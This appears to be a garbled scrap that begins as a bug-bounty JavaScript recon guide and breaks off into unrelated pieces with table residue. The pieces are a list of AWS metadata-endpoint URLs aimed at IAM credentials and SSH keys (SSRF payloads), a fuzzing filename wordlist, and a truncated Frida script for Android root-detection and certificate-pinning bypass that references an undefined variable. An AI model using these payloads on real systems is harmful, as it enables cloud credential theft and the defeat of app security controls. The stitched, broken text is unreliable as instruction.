This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files
=more paths,parameters
->more vulns
)
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
` | |
~/ | |
~ | |
×™× | |
___ | |
__ | |
_ | |
--- |
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
setTimeout(function(){ | |
Java.perform(function (){ | |
console.log("[*] Script loaded") | |
var MenuActivity = Java.use("sg.vantagepoint.mstgkotlin.MenuActivity") | |
StartActivity.RootDetection.overload().implementation = function() { | |
console.log("[*] isDeviceRooted function invoked") | |
return false | |
} | |
console.log(""); | |
console.log("[.] Cert Pinning Bypass/Re-Pinning"); |